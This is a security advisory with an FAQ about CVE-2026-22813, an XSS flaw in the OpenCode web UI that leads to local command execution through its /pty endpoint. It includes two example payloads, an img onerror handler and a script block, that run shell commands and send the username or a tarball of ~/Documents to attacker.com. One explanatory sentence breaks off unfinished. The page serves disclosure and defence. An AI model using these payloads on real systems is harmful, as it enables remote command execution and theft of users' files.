What is CVE-2026-22813?

It is a critical XSS flaw in the OpenCode web UI that allows remote code execution.

How do attackers exploit this flaw?

Attackers trick users into visiting a malicious URL that injects JavaScript into the local OpenCode web interface.

What is the impact of a successful attack?

An attacker can run arbitrary shell commands on the victim's local machine with the user's privileges.

Which versions of OpenCode are affected?

All versions of OpenCode prior to 1.1.10 are vulnerable.

How can I fix this vulnerability?

Upgrade to OpenCode version 1.1.10 or later, which disables the vulnerable web UI and API.

Advisory

OpenCode patches critical RCE flaw in Web UI

published: Jan. 13, 2026

Take action: If you are using OpenCode, update to version 1.1.10 ASAP to disable the vulnerable web UI and API. Avoid clicking untrusted links, check underling URLs and don't click on any links that you haven't crafted but point to your local machine's ports .

Learn More

OpenCode developers fixed a critical security flaw that let malicious websites run commands on a user's local computer.

The vulnerability is tracked as CVE-2026-22813 (CVSS score 10.0) - a lack of sanitization in the markdown renderer allows XSS, leading to remote code execution via local API endpoints.

The flaw combines multiple weaknesses: OpenCode runs a local HTTP server on localhost:4096 with /pty/ endpoints that can spawn arbitrary processes, the web UI fails to sanitize HTML in markdown responses allowing cross-site scripting (XSS), and a ?url= parameter permits loading chat sessions from remote servers. An attacker can host a malicious chat session on their server containing XSS payloads, then trick users into clicking a link that loads this session into their local OpenCode instance. Once the JavaScript executes on the localhost:4096 origin, it can make API calls to the /pty/ endpoints to run any command on the victim's machine. The vulnerability affects all versions before 1.1.10, and while the OpenCode team implemented a server-side fix to block the ?url= parameter,

Exploit 1: Basic Command Execution

Attacker creates malicious chat message:

Hello! <img src="/favicon.png" onerror="
  fetch('/pty', {
    method: 'POST',
    body: JSON.stringify({
      command: '/bin/sh',
      args: ['-c', 'curl https://attacker.com/steal?data=$(whoami)']
    })
  })
" style="display:none"> ```
 **Victim clicks link:**
```
http://localhost:4096/session/malicious?url=https://attacker.com

Result: Command executes on victim's machine, stealing username.

Exploit 2: Ransomware/Data Theft

Malicious payload in chat session:

<script>
fetch('/pty', {
  method: 'POST', 
  body: JSON.stringify({
    command: '/bin/sh',
    args: ['-c', 'tar -czf /tmp/docs.tar.gz ~/Documents && curl -F file=@/tmp/docs.tar.gz https://attacker.com/upload']
  })
})
</script>

Result: Victim's Documents folder is compressed and exfiltrated to attacker's server.

The OpenCode team released 1.1.10 that disables the web UI and API entirely to stop future attacks. Users should update to the latest version to protect their systems.

OpenCode patches critical RCE flaw in Web UI

Read More
Rust programming language on Windows vulnerable to command …
GitLab releases patches to multiple flaws, including critical …
Apache Avro SDK reports arbitrary code execution flaw
Docker Patches Critical 'DockerDash' Flaw in Ask Gordon …
Critical UUID Flaw in Fiber v2 Framework Enables …